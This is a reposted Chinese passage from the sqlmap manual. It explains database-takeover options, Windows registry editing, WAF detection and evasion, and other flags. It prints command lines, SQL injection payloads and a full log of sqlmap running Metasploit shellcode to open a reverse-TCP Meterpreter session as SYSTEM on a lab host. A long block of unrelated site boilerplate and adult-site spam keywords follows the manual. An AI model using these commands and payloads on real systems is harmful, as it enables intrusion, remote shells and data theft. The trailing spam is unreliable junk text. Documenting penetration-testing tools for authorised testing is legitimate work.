參數:--os-pwn,--os-smbrelay,--os-bof,--priv-esc,--msf-path,--tmp-path

當數據庫為MySQL,PostgreSQL或Microsoft SQL Server,并且當前用戶有權限使用特定的函數,可以在數據庫與攻擊者直接建立TCP連接,這個連接可以是一個交互式命令行的Meterpreter會話,sqlmap根據Metasploit生成shellcode,并有四種方式執行它:

1、通過用戶自定義的sys_bineval()函數在內存中執行Metasplit的shellcode,支持MySQL和PostgreSQL數據庫,參數:--os-pwn。 2、通過用戶自定義的函數上傳一個獨立的payload執行,MySQL和PostgreSQL的sys_exec()函數,Microsoft?SQL?Server的xp_cmdshell()函數,參數:--os-pwn。 3、通過SMB攻擊(MS08-068)來執行Metasploit的shellcode,當sqlmap獲取到的權限足夠高的時候(Linux/Unix的uid=0,Windows是Administrator),--os-smbrelay。 4、通過溢出Microsoft?SQL?Server?2000和2005的sp_replwritetovarbin存儲過程(MS09-004),在內存中執行Metasploit的payload,參數:--os-bof

列舉一個MySQL例子:

$?python?sqlmap.py?-u?"http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1"?--os-pwn?--msf-path?/software/metasploit [...] [hh:mm:31]?[INFO]?the?back-end?DBMS?is?MySQL web?server?operating?system:?Windows?2003 web?application?technology:?ASP.NET,?ASP.NET?4.0.30319,?Microsoft?IIS?6.0 back-end?DBMS:?MySQL?5.0 [hh:mm:31]?[INFO]?fingerprinting?the?back-end?DBMS?operating?system [hh:mm:31]?[INFO]?the?back-end?DBMS?operating?system?is?Windows how?do?you?want?to?establish?the?tunnel? [1]?TCP:?Metasploit?Framework?(default) [2]?ICMP:?icmpsh?-?ICMP?tunneling &gt;?[hh:mm:32]?[INFO]?testing?if?current?user?is?DBA [hh:mm:32]?[INFO]?fetching?current?user what?is?the?back-end?database?management?system?architecture? [1]?32-bit?(default) [2]?64-bit &gt;?[hh:mm:33]?[INFO]?checking?if?UDF?'sys_bineval'?already?exist [hh:mm:33]?[INFO]?checking?if?UDF?'sys_exec'?already?exist [hh:mm:33]?[INFO]?detecting?back-end?DBMS?version?from?its?banner [hh:mm:33]?[INFO]?retrieving?MySQL?base?directory?absolute?path [hh:mm:34]?[INFO]?creating?UDF?'sys_bineval'?from?the?binary?UDF?file [hh:mm:34]?[INFO]?creating?UDF?'sys_exec'?from?the?binary?UDF?file how?do?you?want?to?execute?the?Metasploit?shellcode?on?the?back-end?database?underlying?operating?system? [1]?Via?UDF?'sys_bineval'?(in-memory?way,?anti-forensics,?default) [2]?Stand-alone?payload?stager?(file?system?way) &gt;?[hh:mm:35]?[INFO]?creating?Metasploit?Framework?multi-stage?shellcode?which?connection?type?do?you?want?to?use? [1]?Reverse?TCP:?Connect?back?from?the?database?host?to?this?machine?(default) [2]?Reverse?TCP:?Try?to?connect?back?from?the?database?host?to?this?machine,?on?all?ports?between?the?specified?and?65535 [3]?Bind?TCP:?Listen?on?the?database?host?for?a?connection &gt;?which?is?the?local?address??[192.168.136.1]?which?local?port?number?do?you?want?to?use??[60641]?which?payload?do?you?want?to?use? [1]?Meterpreter?(default) [2]?Shell [3]?VNC &gt;?[hh:mm:40]?[INFO]?creation?in?progress?...?done [hh:mm:43]?[INFO]?running?Metasploit?Framework?command?line?interface?locally,?please?wait.._|?|??????o _??_??_????_?_|_??__,???,????_??|?|??__????_|_ /?|/?|/?|??|/??|??/??|??/?\_|/?\_|/??/??\_|??| |??|??|_/|__/|_/\_/|_/?\/?|__/?|__/\__/?|_/|_//|\|=[?metasploit?v3.7.0-dev?[core:3.7?api:1.0] +?--?--=[?674?exploits?-?351?auxiliary +?--?--=[?217?payloads?-?27?encoders?-?8?nops=[?svn?r12272?updated?4?days?ago?(2011.04.07) PAYLOAD?=&gt;?windows/meterpreter/reverse_tcp EXITFUNC?=&gt;?thread LPORT?=&gt;?60641 LHOST?=&gt;?192.168.136.1 [*]?Started?reverse?handler?on?192.168.136.1:60641?[*]?Starting?the?payload?handler... [hh:mm:48]?[INFO]?running?Metasploit?Framework?shellcode?remotely?via?UDF?'sys_bineval',?please?wait.. [*]?Sending?stage?(749056?bytes)?to?192.168.136.129 [*]?Meterpreter?session?1?opened?(192.168.136.1:60641?-&gt;?192.168.136.129:1689)?at?Mon?Apr?11?hh:mm:52?+0100?2011 meterpreter?&gt;?Loading?extension?espia...success. meterpreter?&gt;?Loading?extension?incognito...success. meterpreter?&gt;?[-]?The?'priv'?extension?has?already?been?loaded. meterpreter?&gt;?Loading?extension?sniffer...success. meterpreter?&gt;?System?Language?:?en_US OS??????????????:?Windows?.NET?Server?(Build?3790,?Service?Pack?2). Computer????????:?W2K3R2 Architecture????:?x86 Meterpreter?????:?x86/win32 meterpreter?&gt;?Server?username:?NT?AUTHORITY\SYSTEM meterpreter?&gt;?ipconfig MS?TCP?Loopback?interface Hardware?MAC:?00:00:00:00:00:00 IP?Address??:?127.0.0.1 Netmask?????:?255.0.0.0 Intel(R)?PRO/1000?MT?Network?Connection Hardware?MAC:?00:0c:29:fc:79:39 IP?Address??:?192.168.136.129 Netmask?????:?255.255.255.0 meterpreter?&gt;?exit [*]?Meterpreter?session?1?closed.??Reason:?User?exit

默認情況下MySQL在Windows上以SYSTEM權限運行,PostgreSQL在Windows與Linux中是低權限運行,Microsoft SQL Server 2000默認是以SYSTEM權限運行,Microsoft SQL Server 2005與2008大部分是以NETWORK SERVICE有時是LOCAL SERVICE。

?

對Windows注冊表操作


當數據庫為MySQL,PostgreSQL或Microsoft SQL Server,并且當前web應用支持堆查詢。 當然,當前連接數據庫的用戶也需要有權限操作注冊表。

?

讀取注冊表值

參數:--reg-read

寫入注冊表值

參數:--reg-add

刪除注冊表值

參數:--reg-del

注冊表輔助選項

參數:--reg-key,--reg-value,--reg-data,--reg-type

需要配合之前三個參數使用,例子:

$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1

常規參數


從sqlite中讀取session

參數:-s

sqlmap對每一個目標都會在output路徑下自動生成一個SQLite文件,如果用戶想指定讀取的文件路徑,就可以用這個參數。

保存HTTP(S)日志

參數:-t

這個參數需要跟一個文本文件,sqlmap會把HTTP(S)請求與響應的日志保存到那里。

非交互模式

參數:--batch

用此參數,不需要用戶輸入,將會使用sqlmap提示的默認值一直運行下去。

強制使用字符編碼

參數:--charset

不使用sqlmap自動識別的(如HTTP頭中的Content-Type)字符編碼,強制指定字符編碼如:

--charset=GBK

爬行網站URL

參數:--crawl

sqlmap可以收集潛在的可能存在漏洞的連接,后面跟的參數是爬行的深度。

例子:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3 [...] [xx:xx:53] [INFO] starting crawler [xx:xx:53] [INFO] searching for links with depth 1 [xx:xx:53] [WARNING] running in a single-thread mode. This could take a while [xx:xx:53] [INFO] searching for links with depth 2 [xx:xx:54] [INFO] heuristics detected web page charset 'ascii' [xx:xx:00] [INFO] 42/56 links visited (75%) [...]

規定輸出到CSV中的分隔符

參數:--csv-del

當dump保存為CSV格式時(--dump-format=CSV),需要一個分隔符默認是逗號,用戶也可以改為別的 如:

--csv-del=";"

DBMS身份驗證

參數:--dbms-cred

某些時候當前用戶的權限不夠,做某些操作會失敗,如果知道高權限用戶的密碼,可以使用此參數,有的數據庫有專門的運行機制,可以切換用戶如Microsoft SQL Server的OPENROWSET函數

定義dump數據的格式

參數:--dump-format

輸出的格式可定義為:CSV,HTML,SQLITE

預估完成時間

參數:--eta

可以計算注入數據的剩余時間。

例如Oracle的布爾型盲注:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta [...] [hh:mm:01] [INFO] the back-end DBMS is Oracle [hh:mm:01] [INFO] fetching banner [hh:mm:01] [INFO] retrieving the length of query output [hh:mm:01] [INFO] retrieved: 64 17% [========>??????????????????????????????????????????] 11/64??ETA 00:19

然后:

100% [===================================================] 64/64 [hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod web application technology: PHP 5.2.6, Apache 2.2.9 back-end DBMS: Oracle banner:????'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'

sqlmap先輸出長度,預計完成時間,顯示百分比,輸出字符

刷新session文件

參數:--flush-session

如果不想用之前緩存這個目標的session文件,可以使用這個參數。 會清空之前的session,重新測試該目標。

自動獲取form表單測試

參數:--forms

如果你想對一個頁面的form表單中的參數測試,可以使用-r參數讀取請求文件,或者通過--data參數測試。 但是當使用--forms參數時,sqlmap會自動從-u中的url獲取頁面中的表單進行測試。

忽略在會話文件中存儲的查詢結果

參數:--fresh-queries

忽略session文件保存的查詢,重新查詢。

使用DBMS的hex函數

參數:--hex

有時候字符編碼的問題,可能導致數據丟失,可以使用hex函數來避免:

針對PostgreSQL例子:

$ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors [...] [xx:xx:14] [INFO] fetching banner [xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC) [xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'>function.pg-query</a>]: Query failed: ERROR:??invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.php</b> on line <b>35</b>' [xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2 [...]

自定義輸出的路徑

參數:--output-dir

sqlmap默認把session文件跟結果文件保存在output文件夾下,用此參數可自定義輸出路徑 例如:--output-dir=/tmp

從響應中獲取DBMS的錯誤信息

參數:--parse-errors

有時目標沒有關閉DBMS的報錯,當數據庫語句錯誤時,會輸出錯誤語句,用此參數可以顯示出錯誤信息。

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors [...] [11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list. <b>/sqlmap/mssql/iis/get_int.asp, line 27</b>' [11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list. <b>/sqlmap/mssql/iis/get_int.asp, line 27</b>' [11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list. <b>/sqlmap/mssql/iis/get_int.asp, line 27</b>' [11:12:17] [INFO] target URL appears to have 3 columns in query [...]

其他的一些參數


使用參數縮寫

參數:-z

有使用參數太長太復雜,可以使用縮寫模式。 例如:

python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"

可以寫成:

python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"

還有:

python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"

可以寫成:

python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"

成功SQL注入時警告?

參數:--alert

設定會發的答案

參數:--answers

當希望sqlmap提出輸入時,自動輸入自己想要的答案可以使用此參數: 例子:

$ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--technique=E --answers="extending=N" --batch [...] [xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id' heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y [xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N [...]

發現SQL注入時發出蜂鳴聲

參數:--beep

發現sql注入時,發出蜂鳴聲。

啟發式檢測WAF/IPS/IDS保護

參數:--check-waf

WAF/IPS/IDS保護可能會對sqlmap造成很大的困擾,如果懷疑目標有此防護的話,可以使用此參數來測試。 sqlmap將會使用一個不存在的參數來注入測試

例如:

&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1

如果有保護的話可能返回結果會不同。

清理sqlmap的UDF(s)和表

參數:--cleanup

清除sqlmap注入時產生的udf與表。

禁用彩色輸出

參數:--desable-coloring

sqlmap默認彩色輸出,可以使用此參數,禁掉彩色輸出。

使用指定的Google結果頁面

參數:--gpage

默認sqlmap使用前100個URL地址作為注入測試,結合此選項,可以指定頁面的URL測試。

使用HTTP參數污染(Http parament pollution)

參數:-hpp

HTTP參數污染可能會繞過WAF/IPS/IDS保護機制,這個對ASP/IIS與ASP.NET/IIS平臺很有效。

測試WAF/IPS/IDS保護

參數:--identify-waf

sqlmap 可以嘗試找出 WAF/IPS/IDS 保護,方便用戶做出繞過方式。目前大約支持30種產品的識別。

例如對一個受到ModSecurity WAF保護的MySQL例子:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3 [...] [xx:xx:23] [INFO] testing connection to the target URL [xx:xx:23] [INFO] heuristics detected web page charset 'ascii' [xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)' [xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1' [xx:xx:23] [DEBUG] page not found (404) [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)' [xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper') [...]

模仿智能手機

參數:--mobile

有時服務端只接收移動端的訪問,此時可以設定一個手機的User-Agent來模仿手機登陸。

例如:

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile [...] which smartphone do you want sqlmap to imitate through HTTP User-Agent header? [1] Apple iPhone 4s (default) [2] BlackBerry 9900 [3] Google Nexus 7 [4] HP iPAQ 6365 [5] HTC Sensation [6] Nokia N97 [7] Samsung Galaxy S > 1 [...]

安全的刪除output目錄的文件

參數:--purge-output

有時需要刪除結果文件,而不被恢復,可以使用此參數,原有文件將會被隨機的一些文件覆蓋。

例如:

$ python sqlmap.py --purge-output -v 3 [...] [xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'... [xx:xx:55] [DEBUG] changing file attributes [xx:xx:55] [DEBUG] writing random data to files [xx:xx:55] [DEBUG] truncating files [xx:xx:55] [DEBUG] renaming filenames to random values [xx:xx:55] [DEBUG] renaming directory names to random values [xx:xx:55] [DEBUG] deleting the whole directory tree [...]

啟發式判斷注入

參數:--smart

有時對目標非常多的URL進行測試,為節省時間,只對能夠快速判斷為注入的報錯點進行注入,可以使用此參數。

例子:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart [...] [xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic [xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable [xx:xx:14] [INFO] skipping GET parameter 'ca' [xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic [xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable [xx:xx:14] [INFO] skipping GET parameter 'user' [xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic [xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic [xx:xx:14] [INFO] GET parameter 'id' is dynamic [xx:xx:14] [WARNING] reflective value(s) found and filtering out [xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') [xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id' heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y [xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable [xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable [xx:xx:14] [INFO] testing 'MySQL inline queries' [xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries' [xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable [xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found [xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [xx:xx:24] [INFO] target URL appears to have 3 columns in query [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable [...]

初級用戶向導參數

參數:--wizard 面向初級用戶的參數,可以一步一步教你如何輸入針對目標注入。

$ python sqlmap.py --wizard sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 11:25:26 Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1 POST data (--data) [Enter for None]: Injection difficulty (--level/--risk). Please choose: [1] Normal (default) [2] Medium [3] Hard > 1 Enumeration (--banner/--current-user/etc). Please choose: [1] Basic (default) [2] Smart [3] All > 1 sqlmap is running, please wait.. heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection points with a total of 25 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 2986=2986 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79) CHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=1; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=1 WAITFOR DELAY '0:0:5'-- Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)) --- web server operating system: Windows XP web application technology: ASP, Microsoft IIS 5.1 back-end DBMS operating system: Windows XP Service Pack 2 back-end DBMS: Microsoft SQL Server 2005 banner: --- Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2) --- current user:????'sa' current database:????'testdb' current user is DBA:????True [*] shutting down at 11:25:52

轉載于:https://www.cnblogs.com/WhiteHatKevil/p/10066915.html

總結

以上是生活随笔為你收集整理的sqlmap手册的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

欧美日韩网址 | 亚洲电影一级黄 | 成人黄色大片 | 成人影片在线播放 | 夜夜骑日日 | 久久免费精彩视频 | 国产精品毛片一区二区 | 久久精品综合 | 丁香激情网 | 99视频偷窥在线精品国自产拍 | 亚洲一二三区精品 | 天天色天天操天天爽 | 久久香蕉影视 | 国产免费又黄又爽 | 日韩欧美视频一区二区 | 亚洲精品小区久久久久久 | 欧美俄罗斯性视频 | 一本一本久久a久久精品综合 | 亚洲精品高清视频在线观看 | 日日爽 | 九九综合久久 | 91九色免费视频 | 9797在线看片亚洲精品 | 欧美成人精品在线 | 亚洲精品国产精品国自 | 西西4444www大胆艺术 | 久久精品视频观看 | 色综合久久久久 | 96视频免费在线观看 | 久久精品99久久久久久2456 | 亚洲 欧洲av| 狠狠躁日日躁狂躁夜夜躁av | 中文字幕888 | 婷婷五天天在线视频 | 黄色午夜网站 | 一区二区欧美日韩 | 国产99精品 | 99人成在线观看视频 | 亚洲午夜电影网 | 精品a在线 | 国产精品欧美久久久久无广告 | 97超碰人人| 国产成人一区二区三区 | 亚洲黄色免费观看 | 伊人五月天综合 | 97在线超碰 | 日本三级中文字幕在线观看 | 天天爱天天干天天爽 | 成年人在线免费看片 | 日日爽夜夜爽 | 亚洲精品国产精品乱码不99热 | 国产精品www | 天天天天射 | 国产午夜精品一区二区三区 | 97超碰在线久草超碰在线观看 | 欧美久久精品 | 人人躁 | 成年人免费看片 | 91精选 | 日本激情视频中文字幕 | 亚洲精品视频免费在线 | 亚洲无毛专区 | 天天色 天天 | 91久久丝袜国产露脸动漫 | 在线精品亚洲一区二区 | bbw av| 天天天天天天天操 | 麻豆精品91 | 中文永久免费观看 | 成人免费在线观看电影 | 亚洲精品在线观看免费 | 成人免费观看av | 五月视频 | 日本一区二区三区视频在线播放 | 久久久久亚洲国产 | 天天操天天爱天天爽 | 一本到在线 | 国产手机在线视频 | 国产精品免费观看国产网曝瓜 | 在线视频欧美精品 | 欧美激情另类 | 91麻豆高清视频 | 国产第一二区 | 青青河边草免费观看完整版高清 | 探花系列在线 | 一区二区视频播放 | 有码一区二区三区 | 成人黄色国产 | 欧美精品久久人人躁人人爽 | 亚洲精品国产第一综合99久久 | 色综合久久88色综合天天6 | 国产激情电影综合在线看 | 国产亚洲一区二区在线观看 | 六月丁香在线视频 | 不卡视频一区二区三区 | 手机在线中文字幕 | 波多野结衣精品视频 | 亚洲人人精品 | 黄色免费看片网站 | 久久久人人爽 | 国产你懂的在线 | 欧美在线视频一区二区三区 | 国产精品久久久久一区二区国产 | 欧美国产日韩在线视频 | 国产精品久久久久久久久久免费 | 一区二区三区中文字幕在线 | 成人亚洲精品久久久久 | 亚洲综合色视频 | 九草在线视频 | 99久久精品免费看国产免费软件 | 国产一卡在线 | 中文字幕欧美三区 | 欧美日韩在线免费观看 | 国产精品麻豆三级一区视频 | 国产精品久久久久久69 | 婷婷国产v亚洲v欧美久久 | 亚洲一级电影视频 | 婷婷六月综合网 | 天天激情综合 | 蜜臀av在线一区二区三区 | 成人在线免费观看视视频 | 麻豆 free xxxx movies hd| 日本高清中文字幕有码在线 | 国产高清视频免费最新在线 | 天天做天天爱天天综合网 | 午夜精品视频免费在线观看 | 成人精品国产免费网站 | 一区在线免费观看 | 亚洲国产三级在线观看 | 91久久久国产精品 | 国产三级精品三级在线观看 | 国产激情电影综合在线看 | 久久艹艹 | 国产香蕉97碰碰久久人人 | 日韩av网站在线播放 | 9992tv成人免费看片 | 亚洲成人黄色在线观看 | 成人午夜精品福利免费 | 国产精品第10页 | 亚洲精品播放 | 久草视频观看 | 国产一级精品在线观看 | 国产99久久九九精品 | 激情五月伊人 | 国产高清视频在线播放 | 国产最顶级的黄色片在线免费观看 | 久久免费中文视频 | 在线91观看 | 九九热在线免费观看 | 999视频在线播放 | 精品久久久久久亚洲综合网站 | 99麻豆久久久国产精品免费 | 97免费公开视频 | 国产女v资源在线观看 | 久久视频免费看 | 天天操天天色天天射 | 日韩综合一区二区 | 久久久久久久毛片 | 亚洲精选久久 | av成人黄色 | 精品国产视频一区 | 日韩精品亚洲专区在线观看 | 亚洲精品在线二区 | 97在线观看免费观看高清 | 五月婷丁香 | 国语久久| 91最新网址 | 欧美日韩在线视频一区二区 | 99自拍视频在线观看 | 夜夜骑日日| 欧美黑人xxxx猛性大交 | 麻豆一级视频 | 久久国产综合视频 | 怡红院久久 | 日韩美av在线 | 国产亚洲一级高清 | 久久国产精品系列 | 亚洲动漫在线观看 | 69成人在线| 91精品在线免费观看 | 在线观看黄污 | 亚洲精品88欧美一区二区 | 久久亚洲私人国产精品 | 中文字幕国产在线 | 国产亚洲精品久久网站 | 免费精品人在线二线三线 | 日本韩国精品一区二区在线观看 | 成人免费 在线播放 | 欧美精品免费在线观看 | 色综合久久中文字幕综合网 | 九九爱免费视频在线观看 | 久久久亚洲精华液 | 国产精品九九久久久久久久 | 久久综合影音 | 免费看网站在线 | 91精品国产91久久久久福利 | 国产精品 中文字幕 亚洲 欧美 | 免费看黄电影 | 在线视频专区 | 国产精品无av码在线观看 | 婷婷色网| 不卡国产视频 | 国产精品久久久久久久av电影 | 九草视频在线 | 午夜视频免费播放 | 日韩色爱 | 91av手机在线观看 | 深爱激情五月网 | 亚洲国产999 | 国产91对白在线播 | 国产精品久久久久高潮 | 欧美肥妇free | 精品视频专区 | 黄色大片日本 | 成人av高清在线观看 | 日躁夜躁狠狠躁2001 | 成人蜜桃网 | 九色精品免费永久在线 | 日韩av在线网站 | 婷婷伊人综合亚洲综合网 | 国产在线专区 | 999久久久久久 | 国产专区视频在线观看 | 日韩三级视频在线观看 | 免费成人在线观看视频 | 欧美一级片在线观看视频 | 日韩一区二区三区在线观看 | wwwav视频 | 91精品一区二区三区蜜桃 | 色是在线视频 | 精品久久一级片 | 天天操天天干天天摸 | 欧美狠狠操| 国产成人精品久久久 | 日韩在线网| 国产精品久久久久久五月尺 | 久色网 | 观看免费av | 在线播放国产一区二区三区 | 欧美色综合久久 | 久久久久久美女 | 久久一区91 | 欧美精品999 | 婷婷网五月天 | 9免费视频 | 日本最新高清不卡中文字幕 | 精品嫩模福利一区二区蜜臀 | 久久精品国产一区二区三 | 亚洲艳情| 婷婷激情5月天 | 国产69精品久久99不卡的观看体验 | 久久免费99精品久久久久久 | 午夜精品一区二区三区在线观看 | a视频在线 | 91麻豆精品国产91久久久使用方法 | av成人在线看 | av线上看| 中文视频在线看 | 国产视频久久久久 | 